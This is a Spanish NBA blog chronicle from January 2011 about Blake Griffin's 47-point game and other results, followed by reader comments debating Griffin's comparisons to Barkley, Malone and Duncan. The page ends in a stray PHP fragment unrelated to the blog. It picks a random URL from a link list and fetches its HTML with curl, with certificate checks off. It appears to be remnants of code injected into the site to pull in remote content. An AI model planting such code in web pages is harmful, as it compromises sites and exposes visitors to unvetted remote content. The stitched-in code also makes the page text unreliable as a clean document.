La Crónica (17/01/2011): Griffin cambia el mundo

18 de January de 2011 por TheDeerHunter

La liga tuvo a bien permitirle jugar tras la expulsión del día anterior, y vaya si lo hizo. Hoy suenan algunos nombres para comparar hazañas de tal magnitud. En 25 años sólo un rookie ha registrado un partido por encima de 45 y 10. Shaquille O’neal a sus 20 añitos. Habría que remontarse a Jordan y Rick Barry para recordar otras actuaciones similares a su edad.  Griffin ha hecho en sólo media temporada cosas que no se habían visto en décadas y los Pacers fueron un juguete en manos de La Bestia.

Volvió Garnett de su lesión y lo hizo a lo grande. Sus manos le dieron la victoria a su equipo con un robo providencial a Nelson en los segundos finales. Antes de eso habíamos asistido a un extraordinario toma y daca entre dos de los candidatos al anillo. Otra noche más en poco tiempo donde Orlando falló el pulso. Deberían mejorar esa defensa.

En el Este hubo algunas cosas más destacables. Un triple doble de Rose y un partidazo de Korver sirvieron para que los Bulls doblegaran a Memphis. Sin embargo, el triple doble de Diaw no sirvió para que los Bobcats se impusieran a los Sixers en la prórroga.

Joe Johnson tuvo que ponerse en plan Killer los últimos instantes para que los Hawks resistieran contra los Kings. Los árbitros también pusieron de su parte con decisiones bastante polémicas a su favor. Detroit y Washington tañeron sendas campanadas con sus brillantes victorias sobre Utah y Dallas respectivamente. Sin embargo, el duelo interconferencias se equilibró con Phoenix en el Madison (punto 20.000 de Vinsanity), los Hornets sobre Toronto, Houston sobre Milwaukee y los Warriors sobre los Nets.

Tras el batacazo de ayer los Lakers se pusieron serios con los Thunder y Portland logró otro triunfo vital contra Minnesotta.

MVP: Han habido grandiosas actuaciones esta jornada. El triple doble de Rose; Aldridge 37-12 frente a Love; los 36 de Jo Jo clavándolas en los momentos más calientes; los de Kevin Martin; el partidazo de Vince para celebrar sus 20.000… Pero es que lo de Blake Griffin entra en un plano superior. 47 puntos, 14 rebotes, 3 asistencias. ¡Titán!!!

El rookie: A la sombra de la Bestia, está el partidazo de John Wall cara a cara contra Deron. 19 puntos, 15 asistencias, 5 rebotes y 1 robo.

La sorpresa: Boris Diaw se marcó un triple doble de 25 puntos, 11 rebotes y 11 asistencias aunque perdiera contra los Sixers.

La decepción: Cómo le están echando de menos en Dallas a Caron Butler. El 0 de 7 de Kidd y el 2 de 8 de Marion no ayudan a sobrellevar la pérdida.

El mayor esfuerzo en vano: También muchas alternativas disponibles. Además de Diaw tenemos nombres ilustres como Stoudemire, Deron Williams, Granger, Westbrook, Howard… pero para mí el mayor esfuerzo es el de Dirk Nowitzki aún renqueante de la lesión y marcándose un 32-5-5 que le sirvió de muy poco.

Comenta

16 comentarios a esta entrada

  1. Denise dice:
    #1

    Lo de Griffin es brutal, si no se lesiona, me atrevería a decir que va a ser mejor que Garnett o Duncan, y ya es decir..
    Estaba viendo ayer el NOH-Raptors, y siguiendo por el boxscore el Det-Dallas y el IND-Clippers, y no podía creerme que cada vez que el marcador subía para Clippers era una canasta de Griffin.
    Partidazo de Vince y de Grant Hill, que hubiese sido de él sin las lesiones.
    No pude ver el Boston-Orlando, pero por el resumen, nada que reprochar a ambos conjuntos, ganó el que más suerte tuvo en los instantes finales (maldita mano de Garnett), pero debieron ofrecer un espectáculo grandioso.

      Citar

  2. couxela dice:
    #2

    Lo más espectacular de la actuación de Griffin para mí es su 19 de 24 en tiros… nada menos que un 79%… brutal….

      Citar

  3. CAMPO2 dice:
    #3

    Yo vi el SUNS – KNICKS y fue un espectaculo ofensivo por parte de los dos equipos y Carter estuvo como no estaba en tiempos

      Citar

  4. Viva_Dirk dice:
    #4

    Cuidadín Denise, que Duncan y Garnett son palabras mayores, en especial Duncan. Yo en su dia, en el mock draft de su año lo comparé con Barkley y sigue siendo para mi la comparación mas acertada, por las cualidades físicas que tiene es calcado salvo que mas grande, técnicamente quizá no llegue al nivel del superbocazas, y en caracter tampoco, ahí si es parecido a Duncan.

    Lo mas importante para que sea un jugador realmente legendario va a ser que hacen los Clippers para rodearlo, ahora mismo parece evidente que si pudieran sacar un buen alero por Kaman el equipo redondearía y sería seguir añadiendo piezas en verano. Así de primeras se me ocurre Kaman por Wilson Chandler, sería un gran negocio para ambos, siempre que Kaman se recupere de un esguince de tobillo por el que lleva lesionado 3 meses, jojo.

      Citar

  5. sergio dice:
    #5

    Es muy pronto para hablar de Griffin como sucesor de Kevin y Tim. Tambien es cierto que no habia visto a nadie capaz de hacerlo hasta ahora. El mejor rookie desde Tim Duncan o incluso Shaq. A mi Griffin me recuerda mas a Malone que a Barkley. Aunque quizás sea un punto medio entre los dos.

    Para mi la sorpresa del día es el buen partido de Kwane Brown….

      Citar

  6. telekoman dice:
    #6

    Uff, pues yo no he visto jugar al pollo, pero por los resumenes a mi me parece que técnicamente es mejor que Barkley. Yo no vi al gordo hacer los reversos en carrera que le he visto a este. Eso sí, no se en el tiro lejos de canasta, que el gordo tenía un tiro bastante bastante aceptable.

      Citar

  7. TheDeerHunter dice:
    #7

    Qué partida de ojete de vídeo diosss:

      Citar

  8. Sancho88 dice:
    #8

    joder, como estan las cabezas de las gentes jjajaa. la vedad que tuvo que ser un bochorno para el chico de los cavs, pero el osete tb que cabron, se podía haber cortado. Lo mejor de todo es cuando va el chaval a encararse con el osete y este lo placa con una mierda de empujon, ajjaja, ahi ya me he descojonado.

    bueno, y de la noche NBA, primero asunto Blake Griffin, un jugador claramente llamado a ser una leyenda. Hacer comaparaciones es siempre difícil y a mi no se me parece a ningun jugador de todos los que decis. Lo veo más como un Lebron James pero con más talento y más recursos. Creo que debe controlar el tema de las faltas, porque se le nota que es muy joven y muchas veces se carga a lo tonto de faltas, pero por lo demás… si esta a la altura de los número de Shaq cuando empezó en los Magic, seguramente le corresponda tener un equipo más competitivo. Ojalá que los chavales de los Clippers sigan ayudándolo y vemos a Clippers en playoffs. realmente sería de leyenda si llegaran, algo asi como una machada historica como las antiguas, que estos Clippers fueran la sorpresa y llegaran lejos en playoffs… Ojala.

    Y del partidazo de Joe Johnson doy totalmente fé. destrozó a los Kings. da iwal desde donde tirara porque las metia todas: desde la esquina, su tiro típico, tambien dos contra dos a cinco-seis metros, pasando los bloqueos y penetrando para dejar la bandeja… increible su actuacion. El sólo casi tiro de los Hawks. Bueno, él, y la defensa del señor Al Horford, un tio que realmente se toma en serio su trabajo. Creo que puso 7 chapas ayer, acojonante.

    Sobre las decisiones arbitrales… un poco dudosas sí que fueron, ya que a 0,6 del final le pitan la falta a Evans sobre Johnson cuando este ya había tirado y además que busca el contacto con el brazo de Evans bajando el codo, pero tampoco se puede decir que rigurosamente no fuera falta. En fin, realmente fue un partido que los Hawks se tocaron las pelotas y en el ultimo cuarto comenzaron a defender y aparecio Johnson en ataque. con solo eso les valio para ganar a los Kings… porca miseria de equipo cawen la puta, ajjaaj

      Citar

  9. Denise dice:
    #9

    Joer, he visto el video mientras comía y por poco me atraganto.
    El loser de los Cavs me ha dado pena, pero hay que ser muy tonto para encararse con un tio que lleva un disfraz bastante gordo puesto, que aunque le pegues un buen derechazo ni lo va a sentir con el disfraz.
    Jo, vaya espaldazo que ha pegado el pobre, la verdad es que al tío que hace de oso deberían multarlo.

      Citar

  10. HeiNeKeN dice:
    #10

    A mi el video del Oso me parece un montaje, en plan hacer la gracia en el pabellon…

    Respecto a Griffin… que bueno que viniste!!!

    Ah, y partidazo de Vicente, se me hace raro verlo con el 25, pero claro, Nash es intocable xD.

      Citar

  11. kantonyo dice:
    #11

    Si en verdad es un montaje, no va a hacer mucha gracia en Cleveland, personalmente me ha parecido patetico, y me ha sorprendido que esto pase en Salt Lake City, tan conservadores ellos …

    Yo no veo ningún parecido a Blake con LeBron, incluso le veo menos talentoso y versatil que el de los Heat. Coincido con los que le recuerdan un poco a Barkley y a Karl Malone. Pero creo que tiene su propia personalidad en la cancha.

    Lo más sorprendente es que está haciendo el mismo juego que cuando jugaba en Oklahoma Sooner, a este chaval le da lo mismo jugar con universitarios que con profesionales. Lo que más me fascina es su carácter ganador, no da un balón por perdido.

      Citar

  12. Scriers dice:
    #12

    Pues a mí, sinceramente, ni a Barkley ni a Malone. De hecho creo que al primero le puede llegar a ganar en prestaciones, fíjate lo que te digo. Yo no creo que tenga talento para el tiro, pero los movimientos y el juego de pies que hace es brutal y el sexto sentido para las jugadas en contrataque es una verdadera delicia. A mí, de verdad, me está impresionando brutalmente. Veo los resúmenes de los Clippers porque entre Gordon, el renacido Davis y él nos lo podemos pasar muy bien lo que queda de campaña. Lo único que me da un poco de alarma, son las lesiones, pero amigo, como no se lesione a ver quién para a este tío.

      Citar

  13. TheDeerHunter dice:
    #13

    Habláis de Barkley como si fuera manco.
    No os engañéis. Mientras no se demuestre lo contrario Barkley le pega 1000 vueltas en todo excepto en la altura. Pues no le queda ni nada al chaval…
    Y no estoy quitándole méritos a Griffin, pero compararlo con los que lo estáis comparando simplemente es ciencia ficción ahora mismo.

      Citar

  14. GreenPride dice:
    #14

    Vi el Celtics-Magic y el Lakers-Thunder.
    Gran partido en el Garden con los dos equipos mostrando de lo que pueden ser capaces cuando llegue la hora de la verdad. Por los verdes fenomenal Ray Allen que está haciendo un temporadón y gran partido en su vuelta de Garnett. Rondo en su papel, igual que Shaq y Big Baby. A la hora de la verdad aperecieron los 3 del Big Three para resolver (triples de Allen, canastón 2+1 de Pierce y defensa de Garnett). Por los Magic, Arenas no entra en juego y yo creo que sin el les falta un pequeño salto para poder ganar el anillo. Fenomenal partido de Howard dando muchos problemas al juego interior de Boston pero al final el que se arrimó cuando el balón calentaba fue Turkoglu que metio un par de ellas de jugón total.
    En el Lakers-Thunder buen partido general de los Lakers que siempre llevaron la iniciativa en el marcador. Día gris de Durant que sufre con la defensa de Artest y problemas de los Lakers con Westbrook como siempre que se encuentran un base rápido y atlético. Bien en el final de partido Bryant y Gasol asegurando la victoria para su equipo.
    En cuanto a Blake Griffin yo creo que cuando mejore un poco su tiro de lejos va a ser aún más peligroso e imparable. Para ser su temporada rookie y venir de un año lesionado es impresionante lo que está haciendo. Habrá que darle tiempo para ver si se le puede comparar con los grandes de su posición, Barkley, Malone, Duncan, Garnett pero de momento tiene opciones de ello

      Citar

  15. Viva_Dirk dice:
    #15

    Yo lo comparé con Barkley antes de que pisara una cancha NBA, por condiciones y hambre de basket para mi es lo mas parecido que se ha visto a el.

      Citar

  16. sergio dice:
    #16

    Me sabe mal poner un articulo que es de pago (“INsider”) en la ESPN, pero no me he podido resistir a esta comparación escrita por Hollinger de Griffin con los mejores rookies de la historia reciente. Espero que sepais inglés… si muchos no saben se podría traducir.

    http://groups.google.com/group/alt.sports.basketball.nba.la-lakers/browse_thread/thread/a86cd2c1631ce4b5

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>